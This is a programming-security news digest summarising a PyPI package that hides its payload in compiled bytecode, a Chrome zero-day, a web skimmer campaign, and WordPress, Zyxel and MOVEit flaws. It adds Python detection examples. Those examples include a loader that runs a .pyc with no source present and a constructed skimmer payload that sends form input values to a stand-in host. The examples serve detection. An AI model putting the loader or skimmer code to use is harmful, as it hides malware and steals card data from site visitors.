
Programmer’s Digest #35

06/01/2023-06/07/2023 Malicious PyPI Packages, Google Issues Patch for New Chrome Vulnerability, Urgent WordPress Update And More

1. Malicious PyPI Packages Using Compiled Python Code to Bypass Detection

Researchers have uncovered a new attack on the Python Package Index (PyPI) that evades detection by security tools: it is believed to be the first to use compiled Python code, a Python bytecode (PYC) file, as the payload that is executed directly. The package, fshec2, was removed from the third-party registry following responsible disclosure. PYC files hold the bytecode the interpreter compiles a module into; normally they are cached in __pycache__ when a module is first imported, and a tool that only inspects .py source never reads them. According to the software supply chain security firm that analysed it, the malicious package consists of three files: __init__.py, main.py, and full.pyc.

The main.py file, imported by __init__.py, loads the compiled module from full.pyc using importlib, so no readable source for the payload ships in the package. Reverse-engineering the PYC file reveals code that gathers usernames, hostnames, and directory listings, and executes commands received from a hardcoded server (13.51.44[.]246).
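The two halves of that story, as an added example written for this digest and not code from the fshec2 package or from the firm that analysed it: the importlib loader pattern that runs a .pyc with no source present, and the static triage an analyst can do on the same file without executing it (unmarshal the code object, walk nested functions, collect referenced names and string constants). The sample module, its TEST-NET address 203.0.113.10, and the SUSPICIOUS_NAMES list are constructed for illustration.

```python
import importlib.machinery
import importlib.util
import marshal
import os
import re
import tempfile
import types

# Constructed stand-in for a module like full.pyc. It only *defines* recon and
# command-execution helpers, so importing it executes nothing harmful.
# 203.0.113.10 is a TEST-NET-3 address, not the server named in the report.
SAMPLE_SRC = '''
import os, socket
SERVER = "203.0.113.10"

def collect():
    return {"user": os.getlogin(), "host": socket.gethostname(), "files": os.listdir(".")}

def run(cmd):
    import subprocess
    return subprocess.check_output(cmd, shell=True)
'''


def build_pyc(source: str, filename: str = "full.py") -> bytes:
    """Compile source to a .pyc image: PEP 552 16-byte header + marshalled code object."""
    code = compile(source, filename, "exec")
    header = (importlib.util.MAGIC_NUMBER          # interpreter-specific magic
              + (0).to_bytes(4, "little")           # flags 0 = timestamp-based pyc
              + (0).to_bytes(4, "little")           # source mtime (nothing checks it: no source ships)
              + len(source).to_bytes(4, "little"))  # source size
    return header + marshal.dumps(code)


def load_pyc_module(path: str, name: str = "full") -> types.ModuleType:
    """The loader pattern the report describes: main.py hands full.pyc to importlib and
    SourcelessFileLoader executes the bytecode with no .py on disk to read."""
    loader = importlib.machinery.SourcelessFileLoader(name, path)
    spec = importlib.util.spec_from_file_location(name, path, loader=loader)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)
    return module


# --- static triage: read the bytecode, never execute it ---

def load_code(pyc_bytes: bytes) -> types.CodeType:
    if pyc_bytes[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("magic mismatch: compiled for a different interpreter version")
    return marshal.loads(pyc_bytes[16:])


def walk(code: types.CodeType):
    """Yield a code object and every nested function/class body it carries."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from walk(const)


def strings_in(consts):
    for c in consts:
        if isinstance(c, str):
            yield c
        elif isinstance(c, tuple):      # e.g. constant dict keys
            yield from strings_in(c)


# Constructed watch-list: host recon, command execution, network I/O.
SUSPICIOUS_NAMES = {"subprocess", "check_output", "Popen", "system", "socket",
                    "gethostname", "getlogin", "listdir", "urlopen", "getpass"}
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def triage(pyc_bytes: bytes) -> dict:
    """Flag watch-listed global/attribute names and hard-coded IPv4 literals."""
    names, strings = set(), set()
    for co in walk(load_code(pyc_bytes)):
        names.update(co.co_names)        # globals and attribute names, incl. imports
        strings.update(strings_in(co.co_consts))
    return {"suspicious_names": sorted(names & SUSPICIOUS_NAMES),
            "hardcoded_ips": sorted(s for s in strings if IPV4_RE.match(s))}


def roundtrip_demo() -> str:
    """Write the constructed .pyc to a temp dir, load it the way main.py would, return SERVER."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "full.pyc")
        with open(path, "wb") as f:
            f.write(build_pyc(SAMPLE_SRC))
        return load_pyc_module(path).SERVER


if __name__ == "__main__":
    print(triage(build_pyc(SAMPLE_SRC)))
    print(roundtrip_demo())
```

The triage deliberately stops at co_names and co_consts: that is enough to surface the recon calls and the hardcoded address without running anything, and it works on a .pyc regardless of whether a decompiler supports that interpreter version. The magic check matters in practice, since a PYC built for one CPython release will not unmarshal cleanly under another.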

2. Zero-Day Alert: Google Issues Patch for New Chrome Vulnerability – Update Now!

Google has released security updates for its Chrome web browser to address a high-severity vulnerability (CVE-2023-3079) that is being actively exploited in the wild. The flaw is a type confusion bug in the V8 JavaScript engine that a remote attacker could use to trigger heap corruption via a crafted HTML page. Google has not shared details of the attacks but has confirmed that an exploit exists. This is the third Chrome zero-day Google has addressed this year. Users are advised to update to version 114.0.5735.110 (Windows) or 114.0.5735.106 (macOS and Linux); the update takes effect only after a browser restart. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi should apply the corresponding fixes as soon as their vendors ship them.

3. Magento, WooCommerce, WordPress, and Shopify Exploited in Web Skimmer Attack

Researchers have discovered an ongoing Magecart-style web skimmer campaign that steals personally identifiable information and credit card data from e-commerce websites. What sets this campaign apart is that compromised legitimate sites are themselves used as "makeshift" command-and-control servers, so the malicious code is distributed from domains with an established reputation rather than from attacker infrastructure. Akamai, the web security company that reported it, found victims across North America, Latin America, and Europe, putting the personal data of thousands of site visitors at risk. The attackers use several evasion techniques, including Base64 encoding of the skimmer and disguising the injected script so that it resembles a popular third-party service such as Google Analytics. The attacks have been running for almost a month and target sites built on Magento, WooCommerce, WordPress, and Shopify. The skimmer intercepts form data and exfiltrates it to an actor-controlled server, relying on obfuscation and encoded strings to avoid detection.
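A check that turns the two evasion techniques above into something a site owner can run against their own checkout page, added here as an example and not Akamai's tooling or the campaign's code: it pulls every script out of the HTML, flags external scripts whose URL poses as an analytics loader but is served from a host that is not a Google analytics domain, and decodes any Base64 literal passed to atob() to see whether the hidden stage touches form fields and makes a network call. The sample page, the cdn.fashion-example.com host, the marker list, and the trusted-host list are constructed for illustration.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts that legitimately serve the Google Analytics / Tag Manager loaders (constructed list).
TRUSTED_ANALYTICS_HOSTS = ("google-analytics.com", "googletagmanager.com", "googleadservices.com")
# A script that names itself after analytics but is served from elsewhere is the lookalike.
ANALYTICS_LOOKALIKE = re.compile(r"google|analytics|gtag|gtm", re.I)
# Base64 literals handed to atob(); 40+ chars is enough to hide real code.
ATOB_RE = re.compile(r"""atob\(\s*['"]([A-Za-z0-9+/=]{40,})['"]\s*\)""")
# What a decoded skimmer stage tends to touch: form fields on the way in, a network call out.
SKIMMER_MARKERS = ("document.forms", "querySelectorAll", "input", "card", "cvv",
                   "fetch(", "XMLHttpRequest", "sendBeacon", "Image(")


class ScriptCollector(HTMLParser):
    """Split a page into external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None            # non-None while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def host_is_trusted(host: str) -> bool:
    """Exact or subdomain match only; 'google-analytics.com.evil.example' must not pass."""
    host = (host or "").lower()
    return any(host == t or host.endswith("." + t) for t in TRUSTED_ANALYTICS_HOSTS)


def decode_b64(blob: str) -> str:
    blob += "=" * (-len(blob) % 4)          # tolerate stripped padding
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def scan_html(html: str) -> list:
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        host = urlsplit(src).hostname
        if host and not host_is_trusted(host) and ANALYTICS_LOOKALIKE.search(src):
            findings.append({"kind": "lookalike_src", "src": src})
    for body in p.inline:
        for blob in ATOB_RE.findall(body):
            hits = [m for m in SKIMMER_MARKERS if m in decode_b64(blob)]
            if hits:
                findings.append({"kind": "encoded_payload", "markers": hits})
    return findings


# --- constructed sample page (not captured from any real site) ---
_PAYLOAD = ("document.querySelectorAll('input').forEach(function(i){"
            "new Image().src='https://cdn.fashion-example.com/pixel.gif?d='"
            "+encodeURIComponent(i.name+'='+i.value)})")
SAMPLE_HTML = f"""<html><body>
<script src="https://www.googletagmanager.com/gtag/js?id=G-ABC123"></script>
<script src="https://cdn.fashion-example.com/assets/google-analytics.min.js"></script>
<script>
  var _ga = atob("{base64.b64encode(_PAYLOAD.encode()).decode()}");
  (new Function(_ga))();
</script>
<form><input name="card_number"><input name="cvv"></form>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
```

The host check is the part worth getting right: matching on "google-analytics" anywhere in the URL is exactly what the disguise is designed to pass, so trust is decided on the registrable host, and only an exact or subdomain match counts. Run it against the rendered checkout page rather than the template, since the injected script is what the browser sees, not what the theme files contain.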

4. Urgent WordPress Update Fixes Critical Flaw in Jetpack Plugin on Millions of Sites

WordPress has pushed an automatic update to address a critical vulnerability in the popular Jetpack plugin, which is installed on more than five million sites. Discovered during an internal security audit, the flaw sits in an API that has been present since Jetpack 2.0, released in November 2012, and could let a user with the Author role manipulate any file in the WordPress installation. Jetpack has released 102 new versions, covering releases back to 2.0, to fix the bug. There is no evidence of exploitation in the wild, but vulnerabilities in widely used WordPress plugins are routinely picked up by attackers once disclosed. This is not the first time Jetpack has had a severe weakness; previous incidents have also prompted WordPress to force-install patches. Separately, a security flaw has been disclosed in the Gravity Forms plugin that allows unauthenticated users to inject arbitrary PHP code; it has been fixed in the latest version of the plugin.

5. Zyxel Firewalls Under Attack! Urgent Patching Required

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two recently disclosed vulnerabilities in Zyxel firewalls to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The buffer overflow vulnerabilities, known as CVE-2023-33009 and CVE-2023-33010, could lead to denial-of-service (DoS) attacks and remote code execution. Zyxel released patches for these security flaws on May 24, 2023. Affected devices include ATP, USG FLEX, USG FLEX50(W)/USG20(W)-VPN, VPN, and ZyWALL/USG. The specific details of the attacks are unknown, but this development follows the active exploitation of another Zyxel firewall flaw (CVE-2023-28771) by the Mirai botnet. Federal Civilian Executive Branch agencies have been instructed to address the vulnerabilities by June 26, 2023, to protect their networks. Zyxel has issued guidance advising customers to disable unnecessary services and ports to enhance security.

6. Microsoft: Lace Tempest Hackers Behind Active Exploitation of MOVEit Transfer App

Microsoft has attributed the active exploitation of a critical vulnerability in Progress Software MOVEit Transfer to the threat actor known as Lace Tempest. This threat actor, also known as Storm-0950, is associated with ransomware groups such as FIN11, TA505, and Evil Corp, and operates the Cl0p extortion site. The vulnerability in question, identified as CVE-2023-34362, allows remote attackers to execute arbitrary code by exploiting an SQL injection flaw in MOVEit Transfer. Microsoft’s Threat Intelligence team has observed the deployment of web shells with data exfiltration capabilities following exploitation. Approximately 3,000 exposed hosts utilizing MOVEit Transfer have been identified. The activity has been tracked by Mandiant as UNC4857, with connections to FIN11. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has included the vulnerability in its Known Exploited Vulnerabilities catalog and recommends applying vendor-provided patches by June 23, 2023.
